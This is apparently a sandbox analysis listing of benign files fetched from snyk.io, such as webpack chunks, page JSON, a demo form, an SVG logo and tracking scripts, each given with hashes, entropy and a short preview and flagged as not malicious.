                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:ibGgeGgZcg1k6OAUVt/XWu09u1uJ43isC5KS59NK7QWhGL2e2q+RYT:jZcd6OHfQu1usisUv0dtzg
                                                                                                                                                                                                                                                                                                              MD5:79D9FB10844EADC641A5175992FF698C
                                                                                                                                                                                                                                                                                                              SHA1:02F833169147BF0BF3CCE5C02DFC4361C9682889
                                                                                                                                                                                                                                                                                                              SHA-256:9CBB4289EE029679D4C76F2B9F68D533780036C891BFFDC594D6246DCAB556C8
                                                                                                                                                                                                                                                                                                              SHA-512:D2B0EE8B91632B8E4FE6695FD0F14394F2EC92230CD7A74223546B84B3B6EFDC23B793AC7310C85F17EAC1C51A9D2A259E089BD73C84DCB4A571D5F5036049AF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/7724.1319f18641c3767a.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7724],{67724:function(l,i,e){e.r(i),e.d(i,{default:function(){return b}});var n=e(85893),o=e(45697),d=e.n(o),t=e(19026);e(17585);var a=e(15712),r=e(24982),s=e(34579),u=e(40070),v=e(44133),c=e(15020),m=e(6215),g=e(46275),f=e(52752),h=e(87257);function p(l){var i;let{action:e,className:o,colorScheme:d,description:c,graphicImage:g,icon:f,isCentered:h,miniHeader:p,stat:x}=l;return(0,n.jsxs)("div",{className:(0,v.Z)("max-w-content",h&&"txt-center",o),"data-component":"Text Grid Statistic",children:[!g&&f&&(0,n.jsx)(s.default,{icon:f,isCentered:h,className:"marg-b-small"}),g&&(0,n.jsx)("div",{className:(0,v.Z)("d-block p-relative w-full max-w-2 h-huge radius-small overflow-hidden marg-b-large",h?"marg-h-auto":"marg-h-none"),children:(0,n.jsx)(u.Z,{src:null==g?void 0:g.src,alt:null==g?void 0:g.alt,size:"huge",isCentered:h})}),(0,n.jsx)("p",{className:"txt-headline-large txt-theme-gradient",children:x}),p&&(0,n.jsx)(a.Z,{as:
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4013), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4013
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.411543312033906
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:ibj7sUMJyVLWT20arkNs7L9XbzWRfiuLiYcNjedk/sxw2Mm7tIxWeYv3Tlqdf:mUUqT4rr7ZrzWRDiYTdk/IwoTeK3TYf
                                                                                                                                                                                                                                                                                                              MD5:66D50B1D2D2A265FD6B251874161A48C
                                                                                                                                                                                                                                                                                                              SHA1:AAD3BABB3B7078689ABB5B7525F7E811FB0F0AD7
                                                                                                                                                                                                                                                                                                              SHA-256:7BFCCFED1DD96FA73C1B58DCABEBAE7A4BB97900965B28A90BE8AFA6D70BFC7B
                                                                                                                                                                                                                                                                                                              SHA-512:D6382155BC9DC452FD7059D7F1BE5238C40F8CEF0F804FA4815082118AE9AF20C614F6873E782779B13A1081C81960A400ED6EF9FEF0DA7C2CBD47591CF1C714
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/1025.fe1631a539c940ac.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1025],{8241:function(e,l,a){a.d(l,{d:function(){return t},x:function(){return n}});let n=function(e){let l=arguments.length>1&&void 0!==arguments[1]?arguments[1]:5,a=1;switch(!0){case e>0&&e<l:a=e;break;case e>=l:a=l;break;case l>=12:a=12}return a},t=e=>{let l={hasMaxWidth:!1,itemPadding:"extra-large",gap:"extra-large"};switch(!0){case e<=2:l.hasMaxWidth=!0;break;case 4===e:l.itemPadding="medium",l.gap="medium";break;case e>4:l.itemPadding="medium",l.gap="small"}return l}},41828:function(e,l,a){var n=a(85893),t=a(5152),d=a.n(t),i=a(45697),o=a.n(i),r=a(9981),s=a(23751);let c=d()(()=>a.e(3901).then(a.bind(a,43901)),{loadableGenerated:{webpack:()=>[43901]}}),u=d()(()=>Promise.all([a.e(3259),a.e(2562)]).then(a.bind(a,2562)),{loadableGenerated:{webpack:()=>[2562]}}),b=d()(()=>a.e(8578).then(a.bind(a,78578)),{loadableGenerated:{webpack:()=>[78578]}}),m=d()(()=>Promise.all([a.e(3259),a.e(9384)]).then(a.bind(a,79384)),{loada
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (61920), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):61963
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.139699308704602
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:5Dw3ioZbFiuzzyqKoWB1Z9D9i2HYlmE+70EMVvpxl+fm9re9PE8waMe:FwyKb4uzzXXC9D9hHxE+UXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:D4FD0D5E7C86A92157EDF5564B83E341
                                                                                                                                                                                                                                                                                                              SHA1:73EF2577FD03713DBD46FB2693B850E69C85258C
                                                                                                                                                                                                                                                                                                              SHA-256:620B4F4526FDB59D50AE33EF11E27F031E95B4D8A5B9F1D35CB4727F5F9904CB
                                                                                                                                                                                                                                                                                                              SHA-512:20F4BCA4705037921E480B5D9BCDCC6221468E2A8D754DCE698E2F046F60786A93AA730B6259A8D69CC7DB0F422A740F462303984CBD620C8D65B219029CE2C2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/secure-ai-generated-code.json?slug=solutions&slug=secure-ai-generated-code
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"23INSHR9qwm8wUHnrFuZi5","type":"Entry","createdAt":"2023-10-12T14:03:17.218Z","updatedAt":"2024-06-24T19:55:33.515Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":34,"revision":8,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Secure AI generated code solutions page","title":"Secure AI Generated Code With Snyk | Snyk","slug":"secure-ai-generated-code-with-snyk-or-snyk","uri":"solutions/secure-ai-generated-code","pageLocalization":["ja","de","fr","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6lPtH2cnFbrCvsFokuZnW9","type":"Entry","createdAt":"2023-10-12T14:03:17.340Z","updatedAt":"2024-01-23T19:41:50.706Z","environ
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (20263), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):20263
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.02253476059854
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:ouMyZYARLGBsQ4QYo9GCTaeU+fnodEJ8gSL/8QDg/G8:SyZ/VQYo9GCT2h98
                                                                                                                                                                                                                                                                                                              MD5:153FAAB96A3B0A5E374E9194EA602774
                                                                                                                                                                                                                                                                                                              SHA1:100C8CB5C13E24B6546CF865F8B1D5CC4A4D8FE6
                                                                                                                                                                                                                                                                                                              SHA-256:E76F88C64A31B786668554F6951EE961DD53F292099D486F2A7379F0B73EAEDE
                                                                                                                                                                                                                                                                                                              SHA-512:7DD5A061384CBA7D59B61B08B560952A369E9CFB9AA378CE5527EF1083D8C67FC0F26B6D7FD05E71DFC26223552530C18D0C3307A7461F88EFCB290473BDE64F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://go.snyk.io/index.php/form/getForm?munchkinId=677-THP-415&form=2940&url=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&callback=jQuery37105299860925787463_1729799371942&_=1729799371943
                                                                                                                                                                                                                                                                                                              Preview:jQuery37105299860925787463_1729799371942({"Id":2940,"Vid":2940,"Status":"approved","Name":"Website Demo Request Form","Description":"","Layout":"above","GutterWidth":10,"OffsetWidth":10,"HasTwoButtons":true,"SubmitLabel":"Let's talk","ResetLabel":"Clear","ButtonLocation":"120","LabelWidth":100,"FieldWidth":150,"ToolTipType":"none","FontFamily":"Helvetica, Arial, sans-serif","FontSize":"13px","FontColor":"#333","FontUrl":null,"LineMargin":10,"ProcessorVersion":2,"CreatedByUserid":3421,"ProcessOptions":{"language":"English","locale":"en_GB","profiling":{"isEnabled":true,"numberOfProfilingFields":8,"alwaysShowFields":[]},"socialSignOn":{"isEnabled":false,"enabledNetworks":[],"cfId":null,"codeSnippet":null}},"EnableDeferredMode":0,"EnableCaptcha":0,"EnableGlobalFormValidationRule":1,"ButtonType":null,"ButtonImageUrl":null,"ButtonText":null,"ButtonSubmissionText":"Please Wait","ButtonStyle":{"id":11,"className":"mktoSimple","css":".mktoForm .mktoButtonWrap.mktoSimple .mktoButton {\ncolor:#f
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65512), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):69255
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.167982773149659
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:aZ7wixEDRhginYVRdWE39F0F9G3qzZI9rePorkC6q4mneC38JrERNFETEMVvpxlk:jmaa5uzCJVRNFuXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:06CF1D71C13CC71D928F6A0012A44F4F
                                                                                                                                                                                                                                                                                                              SHA1:FC332568FBF45D5293E598E3F13EE621F480B1C3
                                                                                                                                                                                                                                                                                                              SHA-256:CA0D325BBEC8D77CCC1C3C1C9DD920637C2968FC68702172DF0CE126B58D132D
                                                                                                                                                                                                                                                                                                              SHA-512:FDA7BA24FE35E47EC4F88482DC22AC48236162747BAAA3011FAB422DFD41225B5DB5BDE95F7BEB3B7E20D4E3F2F33BA2CD4BE27BA3DCEABB3888C5B02E2F0E7C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-apprisk.json?slug=product&slug=snyk-apprisk
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3MOxM4tPrMeuahbcCnIUgs","type":"Entry","createdAt":"2023-12-12T12:43:47.376Z","updatedAt":"2024-05-21T19:58:33.071Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":38,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Snyk AppRisk page","title":"Snyk AppRisk for ASPM | Manage And Prioritize Risks At Scale","slug":"snyk-apprisk-for-aspm-or-manage-and-prioritize-risks-at-scale","uri":"product/snyk-apprisk","pageLocalization":["de","ja","fr","pt-BR"],"featuredImage":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1701968319/feature-snyk-apprisk-logo-dashboard.jpg","tags":[],"type":"upload","bytes":115717,"width":1200,"format":"jpg","height":628,"version":1701968319,"duration":null,"metadata":[],"public_
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65489), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):202314
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.046778137770439
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:K0/4a6nz6Yz6Qips18BbyW1n/6eqj7bt3QJvE6v5g7m77Dy:K0/GiEkWj7xwcwgm7C
                                                                                                                                                                                                                                                                                                              MD5:6FB72977ED41E57FF7E83F16B58C9975
                                                                                                                                                                                                                                                                                                              SHA1:1AA32223AE8EF3F3EDCE8C99B2AC326030F28843
                                                                                                                                                                                                                                                                                                              SHA-256:901DFA055D796B9E86660A4F948E3D5F544D94B4481A600E565EFDDD898E7E3B
                                                                                                                                                                                                                                                                                                              SHA-512:14FC13DE7A5155C2315BD68BCB3F97BBAE23DDF86791411225BA43E12C76C019629BCC5C10B5B909448E132ACF67AD692D417393EB9A84F3D1B3351436AF2865
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4JgieApT4FxVhBjVeLozgu","type":"Entry","createdAt":"2022-11-09T19:43:03.207Z","updatedAt":"2023-09-23T16:58:07.088Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":67,"revision":20,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Snyk Intelligence Security page","title":"Industry-Leading Security Intelligence Platform & Proprietary Research | Snyk","slug":"security-intelligence","uri":"platform/security-intelligence","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"0DuTDs1VWvuqAZJcY0tBu","type":"Entry","createdAt":"2022-11-09T19:43:03.299Z","updatedAt":"2024-07-26T13:15:03.323Z","envi
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4811), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4811
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.396407048183825
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:ZAUZCx6KT+/hwSYDU+ZErTnxJT+/5wKH2nnXKe3njf46:fC6KT+/+GmErTxJT+/GwYX5njg6
                                                                                                                                                                                                                                                                                                              MD5:5ADB5C06066458D65349CC117A3022FE
                                                                                                                                                                                                                                                                                                              SHA1:F843F758F4E4FFF4F50485CA7D3AD19178DF3042
                                                                                                                                                                                                                                                                                                              SHA-256:B8CC387E7C1904761DEB1CF2BB0488342FEAF71197E1951D69496641F38690C0
                                                                                                                                                                                                                                                                                                              SHA-512:F5C8284F9112CFE32B80B9EC25160C0116B8EA894090411452A07C186768E74423943B0286367E59B28F09566FBD1D75EFF40B719A483C423590A27B80949797
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/pages/schedule-a-demo-8853bcd3c47033e5.js
                                                                                                                                                                                                                                                                                                              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[935],{83342:function(e,n,l){(window.__NEXT_P=window.__NEXT_P||[]).push(["/schedule-a-demo",function(){return l(35573)}])},11223:function(e,n,l){"use strict";var i=l(85893),o=l(5152),d=l.n(o),a=l(45697),t=l.n(a),s=l(9981),r=l(23751);let c=d()(()=>l.e(572).then(l.bind(l,40572)),{loadableGenerated:{webpack:()=>[40572]}}),u=d()(()=>Promise.all([l.e(6122),l.e(3602)]).then(l.bind(l,3602)),{loadableGenerated:{webpack:()=>[3602]}}),v=d()(()=>l.e(5662).then(l.bind(l,65662)),{loadableGenerated:{webpack:()=>[65662]}});function b(e){var n,l,o,d,a,t;let{component:b}=e,p=(0,r.bU)(),{sys:f,fields:h}=b,m={moleculeAlert:c,organismFeatureCta:u,organismFooterCta:v,DEFAULT:(0,i.jsx)("section",{className:"brandui-section",children:(0,i.jsx)("div",{className:"brandui-container",children:(0,i.jsxs)("p",{className:"pad-small bg-base-rose txt-fail radius-large",children:[(0,s.t)("errorRendering",p)," ",(0,i.jsx)("strong",{children:null==f?void 0:null===(
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 71723
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):21911
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.990284604228861
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:384:eGzePcKhqp8ppchvs0oqCDAJXULtUlxWlkl5HKQ5Ds+XLowwEYDVcDBC0EFYvncy:eGzekKop0cvs2CDWOulHvHKQ5AYOVlDA
                                                                                                                                                                                                                                                                                                              MD5:C467A63B2E7C3A99BE423ACE649014D8
                                                                                                                                                                                                                                                                                                              SHA1:91A3CB3EBF4F3996512A740FC202E1803828594F
                                                                                                                                                                                                                                                                                                              SHA-256:D070E8B363B2CB1BC55B94F1612A1AF673155DF31773E992007F8952E3661EE5
                                                                                                                                                                                                                                                                                                              SHA-512:956B41FC42B9C3C4E161AF37270D3EAEA9E5936B4A99685727235BF9A46BF05ACAE5A64A4EB9A305EBF1ED5F752DF8FB9912626765DEBF1EB82839DF2124CA92
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:...........i{.8.0...........dFo.N'=.N..>.E.%.b".j...X..~....E.2..<.L."A.P...B-.......5.Xx....a...xs..E....K.0pw.Z..N}....`...[...e..N.......,rn.e.+q.........^yQ..I=......vz.O.QPi....3.\&..j...I..[.Q..i..,../y.....l.W.E.S....d..^.A2..V..S/....f..p....@.e.K>..0...u.&.d....X.i.x.f?...q.z<.G.n.C(..Z..U...lo:.e=....b...s....'..I.Qx]..u...~..0.-.X...Q......q8Z.y.8=...m.....a.i@.|.].j."Gv8..".]w.%..1....f..3.....1....O.KfY.n.F....Y....r.@......3....4..,..?.x....K7a>.0.....?..~}...=;k..g.....4....$..O...u.6..<Jn.#o6.C.8.p...a..O..,a#............0..WY.....&....~..].5l._...|w..C..K...[h,..z.y...#*6...E.[,x0V.6B.n.....w....t...$.J.j.#=g.........6..%..?<k._.2.......;kx...`.L*X.k..|..".f5..G."\M.....w....m!l..E.U.+M.m.{;....A.Yg....1O.Z..H.,...6$J....".xT8C.Q8+.3...(\.Di.f.P.......>.....a..4a....u/.'c..L.A.Pe.I...%x..pA...............P..3.i.dAG.8.].H..#..:.....'.0L\.aY;a."..g70L..r ....0...h4.............a.D...m>.b..D..6...Yu.at.h7....*W<
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):7034
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.036762419827118
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:/koIanLX7G0iTnF1YfLsGxFsSitTZ0RsEYc8uT2NpMlAh4QUSbqzTI2x07hX3R:/kkiUYGxVitTZsYcdT2EemTG
                                                                                                                                                                                                                                                                                                              MD5:3D3230B0CC3ABA15BF79709B67D9887C
                                                                                                                                                                                                                                                                                                              SHA1:86AB550A85A12F185F5C7668776C5ADDE56F7F1E
                                                                                                                                                                                                                                                                                                              SHA-256:28598D5C0969E28975D5D5DAA985B4DFA5FC7744838F2219DEF5E89A57E99924
                                                                                                                                                                                                                                                                                                              SHA-512:7B52C1CFE9AD5C433133DAF9B448345E497148CE9BA048D361E42735AEF3C9312F1108254E409C71FE5B609F86587D40A27108C3207C5E9BD2639F77F1DCC181
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1646597794/wordpress-sync/Manulife_logo.svg
                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>. Created with Inkscape (http://www.inkscape.org/) -->..<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd". xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape". width="116.4803". height="22.172541". viewBox="0 0 30.818746 5.8664849". version="1.1". id="svg9535". inkscape:version="0.92.0 r15299". sodipodi:docname="manulife2018.svg">. <defs. id="defs9529">. <clipPath. id="clipPath159". clipPathUnits="userSpaceOnUse">. <path. inkscape:connector-curvature="0". id="path157". d="m 36.064,955.299 h 86.696 v 15.879 H 36.064 Z" />. </clipPath>. </defs>. <sodipodi:namedview. id="base". pagecolor="#ffff
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):150
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.152208297701094
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:YAnQWpW/YlHXAHnB/bgERaOHfHd1m7eEId/LXvVDcKCZhlY:YAngYlHQHnZ8ELvdmALX0rC
                                                                                                                                                                                                                                                                                                              MD5:A4249680AC4D1D89B01993416370C38D
                                                                                                                                                                                                                                                                                                              SHA1:A3DECDEC14F6FD15B2D0599EA4C98D607E338BEC
                                                                                                                                                                                                                                                                                                              SHA-256:EDC98FC1B0F94325B713E1BCAC7655D1816D3A1DDCF37DA13ECD9791B47FFDEA
                                                                                                                                                                                                                                                                                                              SHA-512:039C4DC0A8EC314131D823A8D185B383F671A8A633D7C159BFBF07633A450638B1E0D11E1FEAC96D25F6AF70483CE60D690C242A4F8B0057F79212EA9B580A90
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.zi-scripts.com/unified/v1/master/getSubscriptions
                                                                                                                                                                                                                                                                                                              Preview:{"err":false,"subscriptions":{"ws":{"websiteId":"648751cc35d6eb864afa5399"}},"_zitok":"88c99248376ead0658001729799400","_vtok":"MTczLjI1NC4yNTAuNzE="}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (45495), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):45539
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.11507308504375
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:1B1klYFrZIH1O9C+eo3s8VTpay5cxjapaHUGp3/ppD/EMVvpxl+fm9re9PE8waNn:hZIHkC03s1y5cnHUAvXr9faNqe
                                                                                                                                                                                                                                                                                                              MD5:66A963116EFD8A26E26D87C62ED56C23
                                                                                                                                                                                                                                                                                                              SHA1:64FA4699515EC0AB1780EB3AB44824780D50A9AE
                                                                                                                                                                                                                                                                                                              SHA-256:B576E980D159F53CD2904EB2B9E0621B76C8D72FDB1BDD94434B839EF6AD5DF4
                                                                                                                                                                                                                                                                                                              SHA-512:FDB33A90EB0E2E98E30E9AB3E09E2481733899330C23D30E9C54D3043CFDBB9B52E05E9E231EAFEA6FA3AB355FF9CB6518C979189AC63B94F5F23ED9245EE09F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5VseG6Po3cxKpuifdIMCL3","type":"Entry","createdAt":"2024-08-06T13:12:05.756Z","updatedAt":"2024-08-06T13:12:05.756Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":14,"revision":1,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateBlogPost"}},"locale":"en-US"},"fields":{"title":"Extend the power of your AppSec data with the new Snyk and Snowflake integration ","slug":"snyk-snowflake-data-share","contentTags":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"45dFgwLI6gTlLEOxMpolz3","type":"Entry","createdAt":"2024-08-06T13:12:06.226Z","updatedAt":"2024-08-06T13:12:06.226Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":10,"revision":1,"contentType":{"sys":
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (17065), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):17065
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1089101567430735
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:FtDuCrl6xOIVoCM6qbSjbCMTYozln0/s4MXcK/qtQCZ69CmC4yVs:FtDuCrl6x1OCM1SjbCMTYoz10/s4mcKF
                                                                                                                                                                                                                                                                                                              MD5:E28EBC3391B56E8F01EA063DC089E9D3
                                                                                                                                                                                                                                                                                                              SHA1:D0EB0EDDB70199DB3533F492E7F2E22BE890A1FA
                                                                                                                                                                                                                                                                                                              SHA-256:AFBD41E7209FA3AEF6F53C7A5713AA542A7BE54C432FEC2D690E0DFACCD528D1
                                                                                                                                                                                                                                                                                                              SHA-512:A2ED47575F06F20F3C53845F527E5CEF910A85AAB2CC8F07EFD761239C2255920A154CDF432E170207BE23841458D22BFA96C47CD4ECA590BC71A948B8F98F46
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/js/19.6f85b843.chunk.js
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[19],{"1J7a":function(t,e){t.exports=function _arrayWithHoles(t){if(Array.isArray(t))return t}},"2jbg":function(t,e,r){"use strict";function _setPrototypeOf(t,e){return(_setPrototypeOf=Object.setPrototypeOf||function _setPrototypeOf(t,e){return t.__proto__=e,t})(t,e)}r.d(e,"a",function(){return _setPrototypeOf})},"4+fu":function(t,e,r){"use strict";function _assertThisInitialized(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}r.d(e,"a",function(){return _assertThisInitialized})},"5aO3":function(t,e,r){"use strict";function _arrayLikeToArray(t,e){(null==e||e>t.length)&&(e=t.length);for(var r=0,n=new Array(e);r<e;r++)n[r]=t[r];return n}r.d(e,"a",function(){return _arrayLikeToArray})},"7Ru6":function(t,e){t.exports=function _nonIterableRest(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [S
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4576), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4576
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.041522864674451
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:fudoTA2ERkh8juLjLBCM6nZNwMSY0X7VTNVVIg:eoTA3bu3L7LXog
                                                                                                                                                                                                                                                                                                              MD5:02F5A3E406D8439D15D0F4791E260692
                                                                                                                                                                                                                                                                                                              SHA1:DDF6B75514306244E61238E393F0396CBC53EDD2
